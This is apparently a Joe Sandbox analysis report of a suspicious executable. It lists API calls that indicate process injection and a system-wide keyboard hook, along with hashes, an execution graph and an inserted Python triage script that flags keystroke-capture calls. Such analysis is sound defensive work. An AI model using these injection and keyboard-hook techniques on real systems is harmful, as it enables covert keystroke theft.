                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5c846337e537c8e439475620c89364ea123dfd24c149236e2e4153ddeb8d15a9
                                            • Instruction ID: 180aedf35bba1351949946ab2e2e9a1d99d58684c5c0ea3fcdf1c44f643bfe5a
                                            • Opcode Fuzzy Hash: 5c846337e537c8e439475620c89364ea123dfd24c149236e2e4153ddeb8d15a9
                                            • Instruction Fuzzy Hash: 81217971D002098FDB10EFAAC8847EEBBF5FF48350F108429D559A7240C7789A44CFA0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D64F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: af86d5bafd23498ae3b9631963230babf1fd40d3c42d13078f4813f91ff8fb97
                                            • Instruction ID: 3faf9ca5388fc50cea4ba607d94520ebc54d84f1d8df2d845b450014548bb8eb
                                            • Opcode Fuzzy Hash: af86d5bafd23498ae3b9631963230babf1fd40d3c42d13078f4813f91ff8fb97
                                            • Instruction Fuzzy Hash: 0121E4B5D00248AFDB10CFAAD584ADEFBF8FB48310F14841AE918A3350D379A940CFA4
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87828
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: bf95118dc8764086fde2da999a283fde1aa2e87dc60c3740f30cdf8833943fde
                                            • Instruction ID: 19e3b89eb69405cf356aa696cd543a3eaaa2eb813d450fe5cb2f52215e5624d7
                                            • Opcode Fuzzy Hash: bf95118dc8764086fde2da999a283fde1aa2e87dc60c3740f30cdf8833943fde
                                            • Instruction Fuzzy Hash: A12139B1C003499FCB10DFAAC840AEEFBF5FF48310F208429E519A7250D7789540CBA1
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F87166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: ab718d3836d1830b5e2bc13994630151e478e8fed52b40305310918382406f66
                                            • Instruction ID: 1459944182fa8fcaeb8f3940760cdbd941ef5fc5b198a50ab6956a0438cc08cd
                                            • Opcode Fuzzy Hash: ab718d3836d1830b5e2bc13994630151e478e8fed52b40305310918382406f66
                                            • Instruction Fuzzy Hash: 1F214971D003098FDB10EFAAC8857EEBBF5EF48310F108429D519A7240DB789944CFA0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0275D64F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: a73544ecf640ec04037fec72ccce6bd8b1f3c497b6362c77abbfef3152ee3743
                                            • Instruction ID: 2a8a4990d6920098900bfeaaa5ffa938d316c736064dd8b25463ac1b7a0225f0
                                            • Opcode Fuzzy Hash: a73544ecf640ec04037fec72ccce6bd8b1f3c497b6362c77abbfef3152ee3743
                                            • Instruction Fuzzy Hash: B221E2B59002489FDB10CFAAD984ADEFBF8FB48310F14801AE918A3350D378A940CFA4
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87666
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 2f815d91cdba61c21e2eaa8111eeb36771eb24196ac9c3be3103454aa1950e9b
                                            • Instruction ID: 585c69dec1465fce1f28ab55d223629adc0f5b95ca918a4cfe53920e8633a7ed
                                            • Opcode Fuzzy Hash: 2f815d91cdba61c21e2eaa8111eeb36771eb24196ac9c3be3103454aa1950e9b
                                            • Instruction Fuzzy Hash: 30111775D002499FDB10DFAAC844ADFBBF5EF89710F208419E519A7250C775A540CFA0
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87666
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 5e57341bc08d211fef99a448d328fa45e32efc5ae03cc9aa3b5b04aff1c3921e
                                            • Instruction ID: 1c96474090ff42836510e6cb8de1ccf25fdea6f1e99ef899ad233640413d3adf
                                            • Opcode Fuzzy Hash: 5e57341bc08d211fef99a448d328fa45e32efc5ae03cc9aa3b5b04aff1c3921e
                                            • Instruction Fuzzy Hash: 661126758002499FCB10EFAAC844AEEBFF5EF49310F208419E519A7250C779A540CFA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 216585920d480ad9c7b3a6d1901634f0deeb3fef0a1f34978b93adb29347b0e2
                                            • Instruction ID: 1c7ae7fecdc2d74df3b4338ff6cdb426189f2fae078cbbb5b0f7df527b635360
                                            • Opcode Fuzzy Hash: 216585920d480ad9c7b3a6d1901634f0deeb3fef0a1f34978b93adb29347b0e2
                                            • Instruction Fuzzy Hash: DE1134B5D002488FDB20DFAAC5457EEBBF5EF48310F208819D519A7240C738A545CBA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: c62bc7f036d4ccb5315403389c31e2c0bade717b7f4b51e708cda65c40d54a5f
                                            • Instruction ID: 9af8e29166df21ad2c2c9cafce6913cddee7d3237b115ca8fc3a4b281ebfd1f7
                                            • Opcode Fuzzy Hash: c62bc7f036d4ccb5315403389c31e2c0bade717b7f4b51e708cda65c40d54a5f
                                            • Instruction Fuzzy Hash: E81125B1D002488FDB20DFAAC4457AEFBF5EF89724F208459D519A7240CB79A944CBA4
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8AB65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 557bf5b0d8ff480ed4445f931f76c960ad5462b130d41c7a4a02994ba525cd80
                                            • Instruction ID: 33209123c738d58bcbdcf4a3b77fee05006cf685aa782cbe9d55a9d169e7edac
                                            • Opcode Fuzzy Hash: 557bf5b0d8ff480ed4445f931f76c960ad5462b130d41c7a4a02994ba525cd80
                                            • Instruction Fuzzy Hash: 401103B580034CDFDB10DF9AD884BEEBBF8EB48310F10845AE518A7240D3B9A944CFA5
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8AB65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 511ba79e0308be4d78df5ab5154ae97a5444be6203195cec95cbb39f2960a8b6
                                            • Instruction ID: 39303f043b3ba3ecdad62c7b80b775efc692f3fac86d12915900ded91f45cae2
                                            • Opcode Fuzzy Hash: 511ba79e0308be4d78df5ab5154ae97a5444be6203195cec95cbb39f2960a8b6
                                            • Instruction Fuzzy Hash: E31103B58002489FDB10DF99D985BDEBBF8EB48314F10845AE918A7240D379A944CFA5
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0275B33E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: a1453f6332659a20383bb342c99bf73cbd16fae669401514fa0fa115b4d75f8a
                                            • Instruction ID: 6806b7d62dd788445b2d2b6c5e98a6316e6086516270cc41df9fe8b5815ba7af
                                            • Opcode Fuzzy Hash: a1453f6332659a20383bb342c99bf73cbd16fae669401514fa0fa115b4d75f8a
                                            • Instruction Fuzzy Hash: E11110B6C002498FDB10CF9AD444AEEFBF4EF88314F10846AD919B7244C3B9A545CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9741042fa7beec76e3b07dec5ce2f007af7cbfc47569c592e45e58bba9c565bc
                                            • Instruction ID: 459851b128a6fcf8202f0746506f2ab29aa63338d0cdcf32b4e7ecee82bd8b1a
                                            • Opcode Fuzzy Hash: 9741042fa7beec76e3b07dec5ce2f007af7cbfc47569c592e45e58bba9c565bc
                                            • Instruction Fuzzy Hash: C221F1755042049FDB14DF68D580B26BFA5FB84324F30C97DD80A9B256E33AD406CA61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 924a480c252b47dc1898f7f3729273b858926e41df8845343bb60ee7a4137f03
                                            • Instruction ID: 43bf1b46320032ed602a96e03ece515bd8863ef353d9cf16a76063a66acf9dc8
                                            • Opcode Fuzzy Hash: 924a480c252b47dc1898f7f3729273b858926e41df8845343bb60ee7a4137f03
                                            • Instruction Fuzzy Hash: 7321D071504204AFDB05DFA4D980B26BFB5FB88314F30C97DE94A8B25AD33AD406CA65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 913d98701fdeb9ba9c91452c20ab8112548e93a15ea8d44e5bd66a818bfc9a2f
                                            • Instruction ID: 48f57f8b0884816893b26d76a841f71ad872b885d88653fc8a737e394c37ce2d
                                            • Opcode Fuzzy Hash: 913d98701fdeb9ba9c91452c20ab8112548e93a15ea8d44e5bd66a818bfc9a2f
                                            • Instruction Fuzzy Hash: CF2180755093808FCB12CF24D594715BF71FB46214F28C5EED8898B6A7D33A940ACB62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: b22d24e31d0535d0dfd31296cdbf54c5fa650b48852ba092c9795b1f1295415b
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: D611BB76504280DFCB02CF50C9C4B15BFB1FB84214F24C6AED8498B29AC33AD40ACB62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067250666.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25bd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62b04f93938b4a214b97b2ca7eeeaf5be4a1612e1d523ddc92058efea07534f9
                                            • Instruction ID: 82aaeb0b84a1d86aff9edda9a41b16536bae2c96c0024c93e35188ef1ca0134b
                                            • Opcode Fuzzy Hash: 62b04f93938b4a214b97b2ca7eeeaf5be4a1612e1d523ddc92058efea07534f9
                                            • Instruction Fuzzy Hash: C201A7710063449AE7219B25CD84BE6BFACFF45324F18C96AED090A686D37D9841CAB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067250666.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25bd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06e9309341eb78ea6eac99a50c5f782a0cc4b1abf8767b9840b8ec3dcff538ca
                                            • Instruction ID: 8f3185c20dab23dbff3a035c5550707aa532960d8862b21af4ada092f3ae3477
                                            • Opcode Fuzzy Hash: 06e9309341eb78ea6eac99a50c5f782a0cc4b1abf8767b9840b8ec3dcff538ca
                                            • Instruction Fuzzy Hash: 96F09671405344AEE7218F16CC88BA2FFA8FF45734F18C55AED484B686C3799844CBB5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47a4e44f2c57b94f05ae3580dc585a98761d071ea9c1c06537c6bc284c7e701d
                                            • Instruction ID: fe363d12edc9b93aabad499be15c09ed692130f3aa40cad1a10c9b355ee0b943
                                            • Opcode Fuzzy Hash: 47a4e44f2c57b94f05ae3580dc585a98761d071ea9c1c06537c6bc284c7e701d
                                            • Instruction Fuzzy Hash: CAD19C31B017148FDB69EB79C854B6EB7E7AF89700F1444ADD14A8B3A0DB35E901CB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1860d91ae07cf958d5ff462966d6d7125e390da39476a08e7ca87da5bf4fc32
                                            • Instruction ID: 60c120039b68c3d6dd5ebf9721a81eac85036b8088b77ff2f3d991e42611a63e
                                            • Opcode Fuzzy Hash: b1860d91ae07cf958d5ff462966d6d7125e390da39476a08e7ca87da5bf4fc32
                                            • Instruction Fuzzy Hash: CBE11A74E041198FCB14EFA9C9809AEFBB2FF89305F24C169D415AB356D731A981CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3416be1e7f1f9b3e6b2ba99e4d426a8d3269018f68bc145152d7f3e4e64519f1
                                            • Instruction ID: 3f9dd8a5f4a6e19fb895efab623ac00624f321a78cb99cb1c853066e88f42298
                                            • Opcode Fuzzy Hash: 3416be1e7f1f9b3e6b2ba99e4d426a8d3269018f68bc145152d7f3e4e64519f1
                                            • Instruction Fuzzy Hash: 42E10874E001198FCB54DFA9C9809AEFBF2BF89305F24C1A9D415AB356D731A941CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 019cfbf70fc6ae87ebd2fbbf85861690be5f4498fa5ffe7b19bfd78180cdf14d
                                            • Instruction ID: 102cb7efc5b98348b402586d5c1d0c85067588dc825915ff760cb0a60d2b0de7
                                            • Opcode Fuzzy Hash: 019cfbf70fc6ae87ebd2fbbf85861690be5f4498fa5ffe7b19bfd78180cdf14d
                                            • Instruction Fuzzy Hash: 06E1F774E0411A8FDB14DFA8C5809AEFBF2FF89305F24816AD415AB35AD731A941CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e26b75c0869bd00699ab13d1710b513493b37455d9aba09f54225241fa14b42c
                                            • Instruction ID: f1ea19104217a9c16692d203e050b2dffd63105c632c6bb418264eec3f46a078
                                            • Opcode Fuzzy Hash: e26b75c0869bd00699ab13d1710b513493b37455d9aba09f54225241fa14b42c
                                            • Instruction Fuzzy Hash: 2DE1FA74E041198FCB54EFA9C580AAEFBB2BF89305F24C169D815AB356D730AD41CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a82c6965ab7a2110bb19d57e2234a729012972f491403d287bb413b2c1077aba
                                            • Instruction ID: 42844071724ce359c01d302950d5ec4f2a181e1dec9b83a333f34cbf5657e47f
                                            • Opcode Fuzzy Hash: a82c6965ab7a2110bb19d57e2234a729012972f491403d287bb413b2c1077aba
                                            • Instruction Fuzzy Hash: 2BE1F874E042198FCB54DFA9C5809AEFBB2FF89305F24C1A9D415AB356D730A981CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 989a565f718ca656699f8ea36ee6a4045d8a986d3bfe8ca966a01610485a7474
                                            • Instruction ID: 57d4a4292fd5658acf03cc5c97fe3252ce43ad85d71de3ee44f1a29b244653d8
                                            • Opcode Fuzzy Hash: 989a565f718ca656699f8ea36ee6a4045d8a986d3bfe8ca966a01610485a7474
                                            • Instruction Fuzzy Hash: C4A18B36E002298FCF15DFA4C84459EF7B2FF8A304B15456AE815AB2A4DBB1D916CB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e12446f5e39c33f23019066a709d6e9e299d386a6f60b452cfa54f9c7079b18
                                            • Instruction ID: b4d9328e23b921c88eee9111accd7ae261c281c9c1798a04c3f6f74ef8a32c61
                                            • Opcode Fuzzy Hash: 3e12446f5e39c33f23019066a709d6e9e299d386a6f60b452cfa54f9c7079b18
                                            • Instruction Fuzzy Hash: E0515074E052198FCB14DFA9C9805AEFBF6FF89304F24C1AAD414AB216C7319941CFA1

                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.4%
                                            Total number of Nodes:220
                                            Total number of Limit Nodes:25
execution_graph (rendered as an interactive graph in the original report; the raw node/edge list is condensed here to the nodes that carry API calls)
• Entry nodes: 32b0848, 32b7258, 693e140, 1abd01c, 69378ea, 6938998, 693c6f8
• SetWindowsHookExA: 693fc10, 693fc20, 693fca2, 693ee20, 693fe28
• GetModuleHandleW: 69307b4, 6935e0c, 6935e1c, 6936c3c, 6937390, 6937440, 6937938, 69378f0
• KiUserCallbackDispatcher: 69307d4, 693d8c8
• DeleteFileW: 32b729e
• OleInitialize: 693e190
• OleGetClipboard: 6936c4c, 693d958, 693d968, 693dcc8, 693df58, 693df68, 693e220, 693e230, 693e2d8
• CallWindowProcW: 693d622
• CreateWindowExW: 6938a00
• DuplicateHandle: 693c6f8
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,00000000), ref: 0693FEA3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 0053eeba0a98d0d14eb94d52a75bf52c26f8c78ac8b948619c48e8532266331a
                                            • Instruction ID: e15b8f7b1eb8331d5f0d0706a5c0160d203022720613c5571bd4ad0a8d5986c1
                                            • Opcode Fuzzy Hash: 0053eeba0a98d0d14eb94d52a75bf52c26f8c78ac8b948619c48e8532266331a
                                            • Instruction Fuzzy Hash: 382115B5D002199FCB64DF99D844BEEFBF5FB88310F10842AE519A7250D778A944CFA1
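The function summaries in this report are raw sandbox output, and the one above is the call behind the "Installs a global keyboard hook" verdict: idHook 0x0D is WH_KEYBOARD_LL, which Windows only installs system-wide. The following is an added example, not part of the Joe Sandbox report and not code from the sample, that parses "APIs" / "Memory Dump Source" blocks in this format and flags the keylogger-relevant calls. The sample text is constructed from lines of this report; reading the first field of the .sdmp name as the analysis process index is an assumption.

```python
"""Parse Joe Sandbox function summaries ("APIs" / "Memory Dump Source" blocks)
and flag calls that indicate keystroke capture. Added example, not report code."""
import re
from dataclasses import dataclass

# Constructed sample: API summary lines in the layout used by this report.
SAMPLE = """\
APIs
• SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,00000000), ref: 0693FEA3
Memory Dump Source
• Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
Similarity
• API ID: HookWindows
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8AB65
Memory Dump Source
• Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Similarity
• API ID: MessagePost
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0275B33E
Memory Dump Source
• Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
"""

# "• Api.MODULE(arg,arg,...), ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "• Source File: PPPPPPPP.SSSSSSSS.<id>.<16-hex base>.…sdmp"
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<proc>\d{8})\.(?P<snap>\d{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})\.")

WH_KEYBOARD_LL = 13   # idHook for a low-level keyboard hook; always global
WM_CLOSE = 0x10


@dataclass
class ApiCall:
    api: str
    module: str
    args: list        # raw hex tokens; "?" means the sandbox could not resolve it
    ref: int          # address of the call site
    process_idx: int = -1   # assumption: first .sdmp field = analysis process index
    dump_base: int = 0      # base address of the memory dump the function came from


def arg_int(tok):
    """Resolved hex argument -> int; unresolved '?' -> None."""
    return None if tok.startswith("?") else int(tok, 16)


def parse_summaries(text):
    """Attach each API line to the 'Source File' line that follows it."""
    calls, pending = [], []
    for line in text.splitlines():
        line = line.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")]
            pending.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            for c in pending:
                c.process_idx = int(m["proc"])
                c.dump_base = int(m["base"], 16)
            calls.extend(pending)
            pending = []
    calls.extend(pending)
    return calls


def triage(calls):
    """Return (call, reason) pairs for calls worth a second look."""
    findings = []
    for c in calls:
        if c.api in ("SetWindowsHookExA", "SetWindowsHookExW") and c.args \
                and arg_int(c.args[0]) == WH_KEYBOARD_LL:
            findings.append((c, "WH_KEYBOARD_LL hook: system-wide keystroke capture "
                                "(low-level hooks cannot be thread-scoped)"))
        elif c.api in ("PostMessageA", "PostMessageW") and len(c.args) > 1 \
                and arg_int(c.args[1]) == WM_CLOSE:
            findings.append((c, "WM_CLOSE posted to a window handle"))
    return findings


if __name__ == "__main__":
    for call, why in triage(parse_summaries(SAMPLE)):
        print(f"proc {call.process_idx} dump {call.dump_base:08X} "
              f"{call.api}@{call.ref:08X}: {why}")
```

Unresolved arguments are kept as "?" rather than guessed, so a hook whose idHook the sandbox could not recover is simply not flagged; when extending the rule set, key on argument positions the summary actually resolves.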

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1428 6938992-69389fe 1429 6938a00-6938a06 1428->1429 1430 6938a09-6938a10 1428->1430 1429->1430 1431 6938a12-6938a18 1430->1431 1432 6938a1b-6938a53 1430->1432 1431->1432 1433 6938a5b-6938aba CreateWindowExW 1432->1433 1434 6938ac3-6938afb 1433->1434 1435 6938abc-6938ac2 1433->1435 1439 6938b08 1434->1439 1440 6938afd-6938b00 1434->1440 1435->1434 1441 6938b09 1439->1441 1440->1439 1441->1441
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06938AAA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 7c92ece87e0fa426db64a9fb672e625293a2c29c1bb7233615240f4467357f8a
                                            • Instruction ID: cc5ea500273b8a79f11e526a020eb1d57adece6e818d9d5b43277ac552465267
                                            • Opcode Fuzzy Hash: 7c92ece87e0fa426db64a9fb672e625293a2c29c1bb7233615240f4467357f8a
                                            • Instruction Fuzzy Hash: 6351C0B1D103199FDF14CF99C984ADEBBB5BF48310F24852AE419AB250D775A845CF90

                                            Control-flow Graph

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06938AAA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
